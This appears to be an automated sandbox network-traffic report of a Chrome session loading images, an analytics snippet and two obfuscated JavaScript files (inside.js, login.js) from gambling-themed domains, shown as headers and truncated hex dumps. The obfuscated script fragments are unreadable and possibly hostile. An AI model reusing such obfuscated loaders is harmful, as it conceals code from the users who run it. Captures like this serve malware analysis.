                                                                                                                                                          2024-06-09 22:41:13 UTC1243INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 18 08 06 00 00 00 9b 53 ff 34 00 00 04 a2 49 44 41 54 48 4b a5 96 5b 6c 14 75 14 c6 bf f3 1f ba 2d 20 52 20 da 02 b3 08 c5 56 45 62 c4 a2 b8 b3 91 97 da 17 6c b5 46 1a 21 31 3b 2d 10 01 e5 12 44 0d 4a a2 1b 31 21 2a 34 80 a8 14 1b bb 53 89 b1 e0 a5 7d 51 13 e3 03 0f 3b 55 a4 46 13 40 6e b2 d8 1d b4 a5 18 58 6a a1 2d 3b ff 63 66 2f 65 17 5a b6 6b e7 71 f6 9c ef fc f6 3b 97 5d 42 96 cf 03 ef fd 36 7e 7c c1 e4 f9 02 74 1f 33 17 32 30 8e 98 2e 13 38 24 a3 f8 a9 6d 85 fb 74 36 92 34 a2 60 bf 5f 3c 5a b4 bc 4a 61 5a c1 84 32 02 b9 86 cb 63 f0 09 96 d4 10 e9 bd b8 e7 d8 8b 73 ff cd a4 9f 11 c0 13 b0 ca 84 a0 5d 00 e6 a4 89 31 5f 62 42 17 80 cb 60 9a 00 f0 6c 22 ca 19 8c 61 74 b3 e4 57 cd 5a 35
                                                                                                                                                          Data Ascii: PNGIHDR S4IDATHK[lu- R VEblF!1;-DJ1!*4S}Q;UF@nXj-;cf/eZkq;]B6~|t320.8$mt64`_<ZJaZ2cs]1_bB`l"atWZ5


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          416192.168.2.55018723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC369OUTGET /pc/image-pc/video/ag_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC601INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15093
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3af5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[17],EU-GER-frankfurt-EDGE4-CACHE2[13,TCP_MISS,16],EU-FRA-paris-GLOBAL1-CACHE2[3],EU-FRA-paris-GLOBAL1-CACHE12[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 494141
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 98d2dd4bea76c513d2fe1693c099a631
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC15093INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          417192.168.2.55018623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC369OUTGET /pc/image-pc/video/og_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC604INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15676
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3d3c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[35],EU-GER-frankfurt-EDGE4-CACHE2[31,TCP_MISS,34],EU-FRA-paris-GLOBAL1-CACHE20[22],EU-FRA-paris-GLOBAL1-CACHE24[0,TCP_HIT,20],1.1 google
                                                                                                                                                          X-CCDN-Expires: 494141
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: e4844ec271bf34c95d2944b07ff2bff3
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC15676INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          418192.168.2.550176170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC507OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=3506563745 HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: aliyungf_tc=3de529fcf893d6d3ee212d9780b2d6d818dae7d7247c306b9d3885f4ac9f9c38
                                                                                                                                                          2024-06-09 22:41:14 UTC409INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          vary: Accept-Encoding,Accept-Encoding
                                                                                                                                                          api-elapsed: 5
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                          x-via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          via: 1.1 google
                                                                                                                                                          2024-06-09 22:41:14 UTC1135INData Raw: 34 36 38 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20
                                                                                                                                                          Data Ascii: 468{"analyticsCode":" (function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async =
                                                                                                                                                          2024-06-09 22:41:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          419192.168.2.55018490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC635OUTGET /pc/image-pc/video/pt_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13569
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3501"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE7[393],EU-GER-frankfurt-GLOBAL1-CACHE9[384,TCP_MISS,389],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 1caadcd01cf6d9aeaea49c9401d1dc9f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814502
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC13569INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          420192.168.2.55018523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC373OUTGET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC618INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 20027
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4e3b"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE19[4],EU-FRA-paris-GLOBAL1-CACHE19[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2366190
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9f2781bb9d20ab311e79a273f15427bd
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 225810
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC15766INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:13 UTC4261INData Raw: bc 12 6c ec 17 7c 8f 27 6f 22 f1 ac 4c 89 1c d3 ed 3e 39 67 7d c5 23 67 e8 02 fd 06 bd 7a d0 81 eb 40 b9 74 2e 13 89 a8 d7 4b 44 28 9e 74 7d c4 4b 07 28 c3 7d 95 f6 36 ea ca 38 d8 2d 9e 46 38 5d 2d f7 06 96 38 a4 b4 b9 0b e3 ae e8 24 0a 01 ee 8c b4 fa 4e 9b 4b b6 df a0 c1 3f cb df c4 7d 35 1e ee de ed af bc 83 1c eb 2c 1d e7 26 b5 cf d8 70 dc e6 2e ef 2d 3e 65 1f fe 1d c8 5a da 49 23 5e 47 18 7d e4 c6 8a 77 00 11 b7 32 fd 20 ab 03 4d a7 42 b7 56 c8 62 cd d2 a7 1c 7e 1c bf 6f 1c 6b 9a c7 9d 1e 5a 9d 47 87 3f 67 d0 6a 0f 92 fb 73 ca 78 56 54 db c7 c4 72 36 d6 bc a7 f4 70 b7 f7 56 d3 23 5a ba d1 4c 31 23 20 dd e3 0d 58 c0 20 28 24 93 50 34 1e 6d a6 3a ad 3a b1 f0 22 17 9b 1f 6f 33 4e 0b 77 00 8b ca 40 f1 04 6a e4 3f f4 a7 3c 6b da ae 67 77 6f 24 98 be 25 9c
                                                                                                                                                          Data Ascii: l|'o"L>9g}#gz@t.KD(t}K(}68-F8]-8$NK?}5,&p.->eZI#^G}w2 MBVb~okZG?gjsxVTr6pV#ZL1# X ($P4m::"o3Nw@j?<kgwo$%


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          421192.168.2.55018990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC555OUTGET /pc/240516-03/static/js/components/inside.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC637INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1380
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:51 GMT
                                                                                                                                                          ETag: "6645cacb-564"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[7],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,6],EU-GER-frankfurt-GLOBAL1-CACHE1[24],EU-GER-frankfurt-GLOBAL1-CACHE14[0,TCP_HIT,22],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826096
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 2a62125b285e2401c30531622dac4867
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765904
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC1380INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 54 67 45 59 42 64 41 47 67 47 38 41 6c 41 4d 57 6f 47 45 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 78 46 4c 51 42 4b 63 67 46 39 53 41 63 30 49 41 50 4e 4d 7a 61 63 65 61 50 67 4e 49 64 68 41 49 68 5a 49 51 41 41 69 51 63 41 54 6c 30 37 71 41 33 41 48 6b 77 41 4b 78 43 63 41 64 41 42 4d 51 54 4c 6d 68 41 41 46 41 79 67 67 67 44 48 41 4a 36 59 61 4b 54 71 41 50 71 68 49 45 67 41 73 69 67 4f 4c 41 41 32 49 4f 6f 55 41 47 35 51 38 53 77 67 44 41 43 45 41 41 77 69 67 71 5a 70 42 6a 70 63 41 4c 77 63 6d 4f 71 35 4d 42 42 4d 36 6f 4b 6b 53 47 58 6b 61 46 41 41 74 6c 6e 71 72 6b 68 63 54 73 6b 51 58 68 42 49 44 4e 6a 71 33 4a 30 47 36 6d 51
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgEYBdAGgG8AlAMWoGEAuAMwFc0YAXAS3UxFLQBKcgF9SAc0IAPNMzaceaPgNIdhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQTLmhAAFAygggDHAJ6YaKTqAPqhIEgAsigOLAA2IOoUAG5Q8SwgDACEAAwigqZpBjpcALwcmOq5MBBM6oKkSGXkaFAAtlnqrkhcTskQXhBIDNjq3J0G6mQ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          422192.168.2.55018890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC558OUTGET /pc/240516-03/static/js/components/383/login.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 7440
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:40 GMT
                                                                                                                                                          ETag: "6645cac0-1d10"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE23[2],EU-FRA-paris-GLOBAL1-CACHE2[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467545
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f8f03f941aa4fb8fb8295a93a4480313
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124455
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC7440INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 44 6c 77 46 30 41 61 41 62 77 43 49 41 47 41 4d 51 42 4d 77 4b 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 78 41 6b 75 4a 4e 41 45 70 4b 62 4a 43 41 41 45 53 4c 67 43 63 65 33 43 67 47 34 41 38 6d 41 42 57 49 62 67 44 6f 36 49 46 6a 7a 51 67 41 43 76 4a 51 51 51 38 72 67 45 39 4d 77 69 67 48 30 6e 49 4a 41 46 6b 55 64 4e 67 42 73 51 46 63 67 41 33 4b 42 38 32 45 43 59 41 51 69 6f 41 58 31 45 56 59 50 6c 70 4b 41 42 65 4e 45 77 4b 41 42 45 36 66 47 41 4b 55 52 49 55 56 4e 30 30 71 48 79 65 56 50 53 71 47 41 67 57 50 4a 49 6b 43 6f 6f 41 4f 51 42 4e 41 41 38 31 4f 76 6c 6b 7a 42 52 4d 55 55 77 79 61 4a 49 4e 62 57 35 4d 4a 46 30 41 57 79
